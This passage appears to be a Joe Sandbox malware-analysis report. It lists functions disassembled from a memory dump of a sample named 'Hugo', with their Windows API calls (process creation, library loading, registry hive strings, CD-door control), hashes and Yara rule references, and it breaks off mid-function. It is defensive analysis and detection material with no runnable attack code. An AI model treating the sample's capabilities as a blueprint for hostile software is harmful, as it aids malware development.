Instruction Fuzzy Hash: F6127B356042019FDB14DF14C881A6ABBE5FF88764F14845DF88A9B3A2CB35FD42EB91

Function 00FA13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00FA1462
_wcslen.LIBCMT ref: 00FA149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FA14F0
_wcslen.LIBCMT ref: 00FA1526
_wcslen.LIBCMT ref: 00FA15A2
_wcslen.LIBCMT ref: 00FA161D

Part of subcall function 00F2FD52: _wcslen.LIBCMT ref: 00F2FD5D

Part of subcall function 00F73535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F73547

Strings

UNCHECK, xrefs: 00FA17DA
GETTEXT, xrefs: 00FA1733
GETTOTALCOUNT, xrefs: 00FA148E, 00FA14B3
CHECK, xrefs: 00FA1521, 00FA153C
EXPAND, xrefs: 00FA1694
GETSELECTED, xrefs: 00FA16EA
EXISTS, xrefs: 00FA1618, 00FA1633
COLLAPSE, xrefs: 00FA159D, 00FA15B8
GETITEMCOUNT, xrefs: 00FA16BA
SELECT, xrefs: 00FA17AD
ISCHECKED, xrefs: 00FA177D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: e3b1a9fc65e50daa3aed78fe39f449065d82b2d9234da4f098444c8f5ebbed56
Instruction ID: bea713cb9bdd826566108f4486a5661bd7a2a776d080ce6347fa7b3182ed3465
Opcode Fuzzy Hash: e3b1a9fc65e50daa3aed78fe39f449065d82b2d9234da4f098444c8f5ebbed56
Instruction Fuzzy Hash: C2E1E472A043018FC700DF24C85096AB7E2FF9A354F19895DF8969B3A2DB34ED45EB81

Function 00F9D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9C10E,?,?), ref: 00F9D415
_wcslen.LIBCMT ref: 00F9D451
_wcslen.LIBCMT ref: 00F9D4C8
_wcslen.LIBCMT ref: 00F9D4FE
_wcslen.LIBCMT ref: 00F9D559
_wcslen.LIBCMT ref: 00F9D58F
_wcslen.LIBCMT ref: 00F9D5DF

Strings

HKEY_CLASSES_ROOT, xrefs: 00F9D553, 00F9D558
HKCU, xrefs: 00F9D62E
HKCR, xrefs: 00F9D589, 00F9D58E
HKLM, xrefs: 00F9D4F8, 00F9D4FD
HKEY_LOCAL_MACHINE, xrefs: 00F9D4C2, 00F9D4C7
HKEY_CURRENT_USER, xrefs: 00F9D61D
HKEY_CURRENT_CONFIG, xrefs: 00F9D5D9, 00F9D5DE
HKU, xrefs: 00F9D650
HKEY_USERS, xrefs: 00F9D63F
HKCC, xrefs: 00F9D60C

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 2f08ef2e73bb8375599021d2e2d239ddb17a3fdabd7dc6f316e69a28650f81b7
Instruction ID: 2cb7b349589e135d688f84d6be7ad0e6d9749420af7b198d5c3b5c73ef83ae8c
Opcode Fuzzy Hash: 2f08ef2e73bb8375599021d2e2d239ddb17a3fdabd7dc6f316e69a28650f81b7
Instruction Fuzzy Hash: 2571E933E0012A8BDF10DE7CCD506BA33A19B617B4B3A0125E85697295EA35DD45F760

Function 00FA8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FA8DB5
_wcslen.LIBCMT ref: 00FA8DC9
_wcslen.LIBCMT ref: 00FA8DEC
_wcslen.LIBCMT ref: 00FA8E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FA8E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FA6691), ref: 00FA8EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FA8EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00FA8F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FA8F5C
FreeLibrary.KERNEL32(?), ref: 00FA8F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FA8F78
DestroyIcon.USER32(?,?,?,?,?,00FA6691), ref: 00FA8F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FA8FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FA8FB0

Strings

.exe, xrefs: 00FA8DE3
.icl, xrefs: 00FA8DC3
.dll, xrefs: 00FA8E06

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 7da6f070ddcfb5213ebaeb63a7d6d21c1fd6b4b780054567bc49c8158e72ef44
Instruction ID: 2c04853bbeaec9df27cf1e4b8747f5a3349a3a26145a8dd104b7dc37f41e7022
Opcode Fuzzy Hash: 7da6f070ddcfb5213ebaeb63a7d6d21c1fd6b4b780054567bc49c8158e72ef44
Instruction Fuzzy Hash: 7B61D3B1900219FEEB14DF64CC41BBE77ACBF0AB60F104106F815D61D1DBB4A991EBA0

Function 00F848BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00F8493D
_wcslen.LIBCMT ref: 00F84948
_wcslen.LIBCMT ref: 00F8499F
_wcslen.LIBCMT ref: 00F849DD
GetDriveTypeW.KERNEL32(?), ref: 00F84A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F84A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F84A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F84ACC

Strings

open , xrefs: 00F84A2A
close, xrefs: 00F84943, 00F8495D
closed, xrefs: 00F8494D, 00F84972, 00F8498B, 00F849C3, 00F849DC
wait, xrefs: 00F84A89
set cd door , xrefs: 00F84A6D
close cd wait, xrefs: 00F84AB7
open, xrefs: 00F84999, 00F8499E
type cdaudio alias cd wait, xrefs: 00F84A46

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 15d165728490b76a179d687d29244e8ef6ef66e8e36bb5698354682a1144534c
Instruction ID: 3bed7a74f685aa39863d62b637087d4e87b98b10ca748410cb431bb3b7f15063
Opcode Fuzzy Hash: 15d165728490b76a179d687d29244e8ef6ef66e8e36bb5698354682a1144534c
Instruction Fuzzy Hash: EC71C232A083128FC710FF24C8409ABB7E5EF94768F50492DF89597251EB34ED45EB91

Function 00F76382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00F76395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F763A7
SetWindowTextW.USER32(?,?), ref: 00F763BE
GetDlgItem.USER32(?,000003EA), ref: 00F763D3
SetWindowTextW.USER32(00000000,?), ref: 00F763D9
GetDlgItem.USER32(?,000003E9), ref: 00F763E9
SetWindowTextW.USER32(00000000,?), ref: 00F763EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F76410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F7642A
GetWindowRect.USER32(?,?), ref: 00F76433
_wcslen.LIBCMT ref: 00F7649A
SetWindowTextW.USER32(?,?), ref: 00F764D6
GetDesktopWindow.USER32 ref: 00F764DC
GetWindowRect.USER32(00000000), ref: 00F764E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F7653A
GetClientRect.USER32(?,?), ref: 00F76547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00F7656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F76596

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 52756695035d1c8aeeca6f716cd9902342d0ad9eafdd90eb944a9c37d00dcc4d
Instruction ID: f9659d6fa1ef69a88dd51015a55f3604a93390c8a533fff9511e1eb0e2975069
Opcode Fuzzy Hash: 52756695035d1c8aeeca6f716cd9902342d0ad9eafdd90eb944a9c37d00dcc4d
Instruction Fuzzy Hash: 8A71A071900B09AFDB20DFA8CE45BAEBBF5FF08714F104519E18AE26A0D775E940EB50

Function 00F9086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00F90884
LoadCursorW.USER32(00000000,00007F8A), ref: 00F9088F
LoadCursorW.USER32(00000000,00007F00), ref: 00F9089A
LoadCursorW.USER32(00000000,00007F03), ref: 00F908A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00F908B0
LoadCursorW.USER32(00000000,00007F01), ref: 00F908BB
LoadCursorW.USER32(00000000,00007F81), ref: 00F908C6
LoadCursorW.USER32(00000000,00007F88), ref: 00F908D1
LoadCursorW.USER32(00000000,00007F80), ref: 00F908DC
LoadCursorW.USER32(00000000,00007F86), ref: 00F908E7
LoadCursorW.USER32(00000000,00007F83), ref: 00F908F2
LoadCursorW.USER32(00000000,00007F85), ref: 00F908FD
LoadCursorW.USER32(00000000,00007F82), ref: 00F90908
LoadCursorW.USER32(00000000,00007F84), ref: 00F90913
LoadCursorW.USER32(00000000,00007F04), ref: 00F9091E
LoadCursorW.USER32(00000000,00007F02), ref: 00F90929
GetCursorInfo.USER32(?), ref: 00F90939
GetLastError.KERNEL32 ref: 00F9097B

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 7c459652ca2cc7b80ce3a54a5241006da957366cf6e6f8cb9d50abc8b9dbfa2e
Instruction ID: e8e2300c1bbfa23ff9763f8c2b1689855099c02e35e74b02a886a340eb2409c6
Opcode Fuzzy Hash: 7c459652ca2cc7b80ce3a54a5241006da957366cf6e6f8cb9d50abc8b9dbfa2e
Instruction Fuzzy Hash: D94154B0D083196EDB10DFBA8C8585EBFE8FF44764B50452AE11DE7291DA789801CF91

Function 00F30436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F30436

Part of subcall function 00F3045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00FE170C,00000FA0,9017C7ED,?,?,?,?,00F52733,000000FF), ref: 00F3048C
Part of subcall function 00F3045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F52733,000000FF), ref: 00F30497
Part of subcall function 00F3045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F52733,000000FF), ref: 00F304A8
Part of subcall function 00F3045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F304BE
Part of subcall function 00F3045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F304CC
Part of subcall function 00F3045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F304DA
Part of subcall function 00F3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F30505
Part of subcall function 00F3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F30510

___scrt_fastfail.LIBCMT ref: 00F30457

Part of subcall function 00F30413: __onexit.LIBCMT ref: 00F30419

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F30492
InitializeConditionVariable, xrefs: 00F304B8
WakeAllConditionVariable, xrefs: 00F304D2
kernel32.dll, xrefs: 00F304A3
SleepConditionVariableCS, xrefs: 00F304C4

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 1a47f7c332ccf1d5b25a8d2b0b76d1c39be193b985bd614394e264a6a9d95f0e
Instruction ID: 88132f831d1ea8e0b3b7a741a7ed6739489c626e5c500fb57114ca62a9f6c34c
Opcode Fuzzy Hash: 1a47f7c332ccf1d5b25a8d2b0b76d1c39be193b985bd614394e264a6a9d95f0e
Instruction Fuzzy Hash: 1321F372A407086BD7246BA5EC56BAA3798EB49FB2F040127F902D7690DF74D800BA52

Function 00F73A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F73AD9
_wcslen.LIBCMT ref: 00F73B44

Strings

TEXT, xrefs: 00F73DC8
INSTANCE, xrefs: 00F73D9F
NAME, xrefs: 00F73C81, 00F73C92
CLASS, xrefs: 00F73AD4, 00F73AF1
CLASSNN, xrefs: 00F73B3F, 00F73B50
REGEXPCLASS, xrefs: 00F73BA1, 00F73BB2

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 5f40012547d504f5dad19434db85c5a0e3c6ee2401b06fd353f8cd5be383be6b
Instruction ID: 9c1076d5b46d0442d025effb37898010ff2a174210bcbeb9febf17ceb1dea386
Opcode Fuzzy Hash: 5f40012547d504f5dad19434db85c5a0e3c6ee2401b06fd353f8cd5be383be6b
Instruction Fuzzy Hash: 03E1C332E00516BBCB189F68C8517EDBBB1BF54760F14812BE45AE7250DB30AA89B791

Function 00F84F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00FADCD0), ref: 00F84F6C
_wcslen.LIBCMT ref: 00F84F80
_wcslen.LIBCMT ref: 00F84FDE
_wcslen.LIBCMT ref: 00F85039
_wcslen.LIBCMT ref: 00F85084
_wcslen.LIBCMT ref: 00F850EC

Part of subcall function 00F2FD52: _wcslen.LIBCMT ref: 00F2FD5D

GetDriveTypeW.KERNEL32(?,00FD7C10,00000061), ref: 00F85188

Strings

unknown, xrefs: 00F8514D
all, xrefs: 00F84F76, 00F84F7B
ramdisk, xrefs: 00F85136
cdrom, xrefs: 00F84FD4, 00F84FD9
removable, xrefs: 00F8502F, 00F85034
network, xrefs: 00F850E2, 00F850E7
fixed, xrefs: 00F8507A, 00F8507F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: c298af4ba2fd0da7edb778f9918e09bc738e7a0ff72e6c3b8f8c578a8e1bf199
Instruction ID: 116be8ba469f2c6a10500b8bde6ef469d90830adcc58bf2013b3de6afd48feb9
Opcode Fuzzy Hash: c298af4ba2fd0da7edb778f9918e09bc738e7a0ff72e6c3b8f8c578a8e1bf199
Instruction Fuzzy Hash: 0FB1F731A087029FC710FF28CC90AAAB7E5BF94B60F50491DF596C7291DB34D884E792

Function 00F9BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F9BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F9BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F9BC34
_wcslen.LIBCMT ref: 00F9BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F9BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F9BC96
_wcslen.LIBCMT ref: 00F9BD92

Part of subcall function 00F80F4E: GetStdHandle.KERNEL32(000000F6), ref: 00F80F6D

_wcslen.LIBCMT ref: 00F9BDAB
_wcslen.LIBCMT ref: 00F9BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F9BE16
GetLastError.KERNEL32(00000000), ref: 00F9BE67
CloseHandle.KERNEL32(?), ref: 00F9BE99
CloseHandle.KERNEL32(00000000), ref: 00F9BEAA
CloseHandle.KERNEL32(00000000), ref: 00F9BEBC
CloseHandle.KERNEL32(00000000), ref: 00F9BECE
CloseHandle.KERNEL32(?), ref: 00F9BF43

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 0c41d64fb64fe3c5176735425cd3f41fb26e961eacfa22a5fb8a377603788106
Instruction ID: 7a978099c67c35949d557940e6dbb406c7efe4da52df604c1f532caa2cf11385
Opcode Fuzzy Hash: 0c41d64fb64fe3c5176735425cd3f41fb26e961eacfa22a5fb8a377603788106
Instruction Fuzzy Hash: 8AF1E131A043009FDB14EF24DD91B6ABBE5BF85320F14855DF8898B2A2CB35EC45EB52

Function 00F94A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FADCD0), ref: 00F94B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F94B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00FADCD0), ref: 00F94B4F
FreeLibrary.KERNEL32(00000000,?,00FADCD0), ref: 00F94B9B
StringFromGUID2.OLE32(?,?,00000028,?,00FADCD0), ref: 00F94C05
SysFreeString.OLEAUT32(00000009), ref: 00F94CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F94D25
SysFreeString.OLEAUT32(?), ref: 00F94D4F

Strings

kernel32.dll, xrefs: 00F94B13
GetModuleHandleExW, xrefs: 00F94B24

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: f28e1280214a80ef9ebdb4cfbaf61c61c54512d6e843af9b92b3c0841b3db1a8
Instruction ID: 287e6ab32f7e47fa984d3c9a4dd5f37ee5cf3c418ded8f7560171053995c5e38
Opcode Fuzzy Hash: f28e1280214a80ef9ebdb4cfbaf61c61c54512d6e843af9b92b3c0841b3db1a8
Instruction Fuzzy Hash: 53122A75A00109EFEF14DF54C888EAAB7B5FF95318F148098E90AAB251D731FD46DBA0

Function 00F1381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00FE29C0), ref: 00F53F72
GetMenuItemCount.USER32(00FE29C0), ref: 00F54022
GetCursorPos.USER32(?), ref: 00F54066
SetForegroundWindow.USER32(00000000), ref: 00F5406F
TrackPopupMenuEx.USER32(00FE29C0,00000000,?,00000000,00000000,00000000), ref: 00F54082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F5408E

Strings

0, xrefs: 00F1382D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 9c0afb400c61db1bb3fdc5a8efc323077e3a68cb0514a21b428e742e321184e6
Instruction ID: c3343b4bd5e2c57521397e83995a2d3759d9a96603f1d16608d2a46180ea669d
Opcode Fuzzy Hash: 9c0afb400c61db1bb3fdc5a8efc323077e3a68cb0514a21b428e742e321184e6
Instruction Fuzzy Hash: 98711571A44205FFEB258F28DC89FAABFA4FF05374F140206FA15A61D0C7B1A954EB90

Function 00FA7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00FA7823

Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FA7897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FA78B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA78CC
DestroyWindow.USER32(?), ref: 00FA78ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F10000,00000000), ref: 00FA791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA7935
